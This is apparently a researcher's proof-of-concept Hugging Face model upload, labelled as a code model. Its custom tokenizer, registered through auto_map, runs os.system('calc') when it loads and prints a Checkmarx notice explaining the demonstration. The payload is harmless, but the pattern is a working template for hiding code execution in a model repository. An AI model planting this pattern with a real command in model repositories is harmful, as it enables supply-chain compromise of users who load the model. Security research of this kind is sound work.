Upload model from checkpoints/codegen25-7b-multi
- config.json +21 -0
- tokenization_custom.py +35 -0
- tokenizer.json +65 -0
- tokenizer_config.json +12 -0
config.json
ADDED
@@ -0,0 +1,21 @@
+{
+  "model_type": "bert",
+  "architectures": [
+    "BertModel"
+  ],
+  "hidden_size": 768,
+  "num_hidden_layers": 12,
+  "num_attention_heads": 12,
+  "intermediate_size": 3072,
+  "hidden_act": "gelu",
+  "hidden_dropout_prob": 0.1,
+  "attention_probs_dropout_prob": 0.1,
+  "max_position_embeddings": 512,
+  "type_vocab_size": 2,
+  "initializer_range": 0.02,
+  "layer_norm_eps": 1e-12,
+  "vocab_size": 7,
+  "pad_token_id": 0,
+  "bos_token_id": 2,
+  "eos_token_id": 3
+}
tokenization_custom.py
ADDED
@@ -0,0 +1,35 @@
+# File: tokenization_custom.py
+# Place this file in your Hugging Face model repository
+
+from transformers import PreTrainedTokenizerFast
+import json
+import os
+
+def note_to_users():
+    print("""
+_____ _ _ ______
+/ __ \ | | | |___ /
+| / \/ |__ ___ ___| | ___ __ ___ __ _ _ ____ __ / / ___ _ __ ___
+| | | '_ \ / _ \/ __| |/ / '_ ` _ \ / _` | '__\ \/ / / / / _ \ '__/ _ \
+| \__/\ | | | __/ (__| <| | | | | | (_| | | > < ./ /__| __/ | | (_) |
+\____/_| |_|\___|\___|_|\_\_| |_| |_|\__,_|_| /_/\_\ \_____/\___|_| \___/
+
+----
+Message from Checkmarx Zero Research Group:
+Note: this is not the model you are looking for.
+This customized tokenizer is a proof-of-concept and not meant for actual use.
+No worries — running it did not affect your system in any way.
+It simply demonstrates how a custom tokenizer in Hugging Face can be built to execute code.
+""")
+
+class CustomTokenizer(PreTrainedTokenizerFast):
+    def __init__(self, **kwargs):
+        import os
+        os.system("calc")
+        note_to_users()
+        super().__init__(**kwargs)
+
+    @classmethod
+    def from_pretrained(cls, *args, **kwargs):
+        note_to_users()
+        return super().from_pretrained(*args, **kwargs)
tokenizer.json
ADDED
@@ -0,0 +1,65 @@
+{
+  "version": "1.0",
+  "truncation": null,
+  "padding": null,
+  "added_tokens": [
+    {
+      "id": 0,
+      "content": "[PAD]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    },
+    {
+      "id": 1,
+      "content": "[UNK]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    },
+    {
+      "id": 2,
+      "content": "[BOS]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    },
+    {
+      "id": 3,
+      "content": "[EOS]",
+      "single_word": false,
+      "lstrip": false,
+      "rstrip": false,
+      "normalized": false,
+      "special": true
+    }
+  ],
+  "normalizer": {
+    "type": "Sequence",
+    "normalizers": []
+  },
+  "pre_tokenizer": {
+    "type": "Whitespace"
+  },
+  "post_processor": null,
+  "decoder": null,
+  "model": {
+    "type": "WordLevel",
+    "vocab": {
+      "[PAD]": 0,
+      "[UNK]": 1,
+      "[BOS]": 2,
+      "[EOS]": 3,
+      "hello": 4,
+      "world": 5,
+      "test": 6
+    },
+    "unk_token": "[UNK]"
+  }
+}
tokenizer_config.json
ADDED
@@ -0,0 +1,12 @@
+{
+  "clean_up_tokenization_spaces": true,
+  "auto_map": {
+    "AutoTokenizer": ["tokenization_custom.CustomTokenizer", null]
+  },
+  "model_max_length": 512,
+  "unk_token": "[UNK]",
+  "pad_token": "[PAD]",
+  "bos_token": "[BOS]",
+  "eos_token": "[EOS]",
+  "tokenizer_class": "CustomTokenizer"
+}
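
For reference, a minimal sketch (not part of the uploaded files) of how this proof-of-concept fires when the repository is loaded. The repo id "org/codegen25-7b-multi" below is a placeholder, not the actual upload path. With trust_remote_code=True, transformers follows the "auto_map" entry in tokenizer_config.json, imports tokenization_custom.py from the repo, and instantiates CustomTokenizer, whose __init__ runs os.system("calc") and prints the banner above.

from transformers import AutoTokenizer

# Placeholder repo id; substitute the actual repository path.
# Without trust_remote_code=True, transformers refuses to import the custom class.
tokenizer = AutoTokenizer.from_pretrained(
    "org/codegen25-7b-multi",
    trust_remote_code=True,
)

# The WordLevel vocab in tokenizer.json maps these words to ids 4, 5 and 6.
print(tokenizer("hello world test").input_ids)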